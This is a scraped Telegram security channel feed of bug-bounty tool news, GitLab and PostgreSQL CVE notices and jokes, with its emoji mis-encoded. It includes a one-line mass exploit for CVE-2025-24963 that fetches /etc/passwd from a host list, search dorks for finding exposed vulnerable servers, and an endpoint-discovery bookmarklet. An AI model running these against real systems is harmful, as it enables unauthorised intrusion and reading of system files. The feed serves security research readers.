Brut Security
14.7K subscribers
910 photos
73 videos
287 files
967 links
โœ…Queries: @wtf_brut
๐Ÿ›ƒWhatsApp: wa.link/brutsecurity
๐ŸˆดTraining: brutsec.com
๐Ÿ“จE-mail: [email protected]
Download Telegram
๐—ฃ๐—ฎ๐˜†๐—น๐—ผ๐—ฎ๐—ฑ ๐—ช๐—ถ๐˜‡๐—ฎ๐—ฟ๐—ฑ ๐Ÿค– - AI assistant that utilizes GPT-3.5 and GPT-4 language models to interpret and generate cybersecurity payloads.

๐Ÿ”— payload-wizard.vercel.app
๐Ÿ‘11๐Ÿ”ฅ4
CVE-2025-0376 and other: Multiple vulnerabilitites in GitLab, 4.2 - 8.7 ratingโ—๏ธ

With the new release, GitLab has disclosed several vulnerabilities, including XSS injection, DoS and others.

Search at Netlas.io:
๐Ÿ‘‰ Link: https://nt.ls/50gFr
๐Ÿ‘‰ Dork: http.favicon.hash_sha256:72a2cad5025aa931d6ea56c3201d1f18e68a8cd39788c7c80d5b2b82aa5143ef OR http.headers.set_cookie:"gitlab" OR http.headers.location:"gitlab"

Vendor's advisory: https://about.gitlab.com/releases/2025/02/12/patch-release-gitlab-17-8-2-released/
๐Ÿ‘10๐Ÿ”ฅ2โค1
โคโคโคโ€œHappy Valentineโ€™s Day to all the hackers out there! May your hearts never get 403 Forbidden, your love life stay fully patched, and your crushes always respond with a 200 OK!โ€๐Ÿ‘ป๐Ÿ‘ป๐Ÿ‘ป
Please open Telegram to view this post
VIEW IN TELEGRAM
โค36๐Ÿคฃ25๐Ÿ˜ข4๐Ÿ˜1๐Ÿ‘จโ€๐Ÿ’ป1
BGPView for Reconnaissance
๐Ÿ”ฅ14๐Ÿ‘6
โคโคโคFind Your Valentine on Twitter.
https://valentine-twitter.vercel.app/
Please open Telegram to view this post
VIEW IN TELEGRAM
๐Ÿคฃ29๐Ÿ˜4
๐Ÿคฃ23๐Ÿ‘7๐Ÿณ7
๐Ÿ’ธ๐Ÿ’ธ๐Ÿ’ธ
Please open Telegram to view this post
VIEW IN TELEGRAM
When cybersecurity burnout hits, off-grid life starts calling. ๐Ÿ˜‚
๐Ÿคฃ18๐Ÿ˜4๐Ÿ‘2
This media is not supported in your browser
VIEW IN TELEGRAM
๐Ÿ”ฅ๐Ÿ”ฅ๐Ÿ”ฅProjectDiscovery launched Nuclei v1 with an -ai flag that makes custom vulnerability detection simple, no YAML skills needed. It now offers instant AI-powered scanning from the command line, smarter template editing, external link support, automated security regressions, and larger context windows for all users. Check it out here: https://projectdiscovery.io/blog/reinventing-custom-detections-and-vulnerability-management
Please open Telegram to view this post
VIEW IN TELEGRAM
๐Ÿ‘15๐Ÿ—ฟ8๐Ÿ”ฅ5โค4๐Ÿ‘1๐Ÿซก1
๐Ÿ›ก๐Ÿ›กLooking for a specific Nuclei template?  Use the -tl option to list all available Nuclei Templates and then grep for the keyword you're interested in!
Please open Telegram to view this post
VIEW IN TELEGRAM
๐Ÿ‘11๐Ÿ‘7โค3
๐Ÿ—ฃ๏ธ๐Ÿ—ฃ๏ธ๐Ÿ—ฃ๏ธ
Please open Telegram to view this post
VIEW IN TELEGRAM
๐Ÿ”ฅ37๐Ÿคฃ6๐Ÿ‘3๐Ÿ—ฟ1
โšก๏ธgrepsubsfromwebpages

โœ…Extract subdomains automatically while visiting webpages. Just add target domain name and this extension will start extracting subs from the webpages you visit.

๐Ÿ“Œ
https://github.com/hackersthan/grepsubsfromwebpages
๐Ÿ‘9โค2๐Ÿ”ฅ2
๐Ÿšจ CVE-2025-24963 - Vitest Browser Mode Local File Read ๐Ÿšจ

๐Ÿ’ฅOne Liner Exploit:
cat file.txt | while read host; do curl -skL "https://$host/__screenshot-error?file=/etc/passwd" | grep -E "root:.*:/bin/" && echo "$host is VULN"; done
๐Ÿ‘7๐Ÿ”ฅ4โค1
This media is not supported in your browser
VIEW IN TELEGRAM
๐Ÿ‘ป๐Ÿ‘ป๐Ÿ‘ปMedusa by @Ch0pin is a game-changer for mobile bug hunters ๐Ÿ“ฑ๐Ÿ•ต๏ธ

๐Ÿ”ฅ๐Ÿ”ฅWith its FRIDA-powered framework, you can automate tasks like bypassing SSL pinning, tracing function calls, and modifying app behaviour in real time. Perfect for uncovering vulnerabilities in Android & iOS apps! ๐Ÿ”

๐ŸŽคCheck it out ๐Ÿ‘‰ https://github.com/Ch0pin/medusa
Please open Telegram to view this post
VIEW IN TELEGRAM
๐Ÿ‘13โค7๐Ÿ”ฅ5
๐Ÿ˜‚๐Ÿ˜‚๐Ÿ˜‚๐Ÿ˜‚
Please open Telegram to view this post
VIEW IN TELEGRAM
๐Ÿ˜ข21๐Ÿคฃ4๐Ÿ‘2๐Ÿ”ฅ1
๐Ÿšจ CVE-2025-1094: PostgreSQL psql SQL injection
๐Ÿ”ฅPoC:https://github.com/rapid7/metasploit-framework/pull/19877
๐ŸงDeep Dive :https://attackerkb.com/topics/G5s8ZWAbYH/cve-2024-12356/rapid7-analysis

๐Ÿ‘‡Dorks:
HUNTER : protocol="postgresql"
FOFA : product="PostgreSQL"
SHODAN : "port:5432 PostgreSQL"

๐Ÿ“ฐRefer:https://thecyberthrone.in/2025/02/15/cve-2025-1094-impacts-postgresql-with-sql-injection/
๐Ÿ‘12๐Ÿ”ฅ5โค3๐Ÿ‘1
This media is not supported in your browser
VIEW IN TELEGRAM
๐Ÿ”–Find hidden Endpoints:

javascript:(async function(){let scanningDiv=document.createElement("div");scanningDiv.style.position="fixed",scanningDiv.style.bottom="0",scanningDiv.style.left="0",scanningDiv.style.width="100%",scanningDiv.style.maxHeight="50%",scanningDiv.style.overflowY="scroll",scanningDiv.style.backgroundColor="white",scanningDiv.style.color="black",scanningDiv.style.padding="10px",scanningDiv.style.zIndex="9999",scanningDiv.style.borderTop="2px solid black",scanningDiv.innerHTML="<h4>Scanning...</h4>",document.body.appendChild(scanningDiv);let e=[],t=new Set;async function n(e){try{const t=await fetch(e);return t.ok?await t.text():(console.error(`Failed to fetch ${e}: ${t.status}`),null)}catch(t){return console.error(`Error fetching ${e}:`,t),null}}function o(e){return(e.startsWith("/")||e.startsWith("./")||e.startsWith("../"))&&!e.includes(" ")&&!/[^\x20-\x7E]/.test(e)&&e.length>1&&e.length<200}function s(e){return[...e.matchAll(/['"]((?:\/|\.\.\/|\.\/)[^'"]+)['"]/g)].map(e=>e[1]).filter(o)}async function c(o){if(t.has(o))return;t.add(o),console.log(`Fetching and processing: ${o}`);const c=await n(o);if(c){const t=s(c);e.push(...t)}}const l=performance.getEntriesByType("resource").map(e=>e.name);console.log("Resources found:",l);for(const e of l)await c(e);const i=[...new Set(e)];console.log("Final list of unique paths:",i),console.log("All scanned resources:",Array.from(t)),scanningDiv.innerHTML=`<h4>Unique Paths Found:</h4><ul>${i.map(e=>`<li>${e}</li>`).join("")}</ul>`})();
Please open Telegram to view this post
VIEW IN TELEGRAM
๐Ÿ”ฅ33๐Ÿ‘7โค3
โšก๏ธOne Million Dorks - A repository with text files containing a million dorks for finding potentially vulnerable web pages and sensitive data (in Google and other search engines). Can be used with various automation tools.

๐ŸŽฏ
https://github.com/HackShiv/OneDorkForAll/tree/main/dorks/1M_dork


#bugbounty #cybersecurity
๐Ÿ”ฅ19๐Ÿ‘9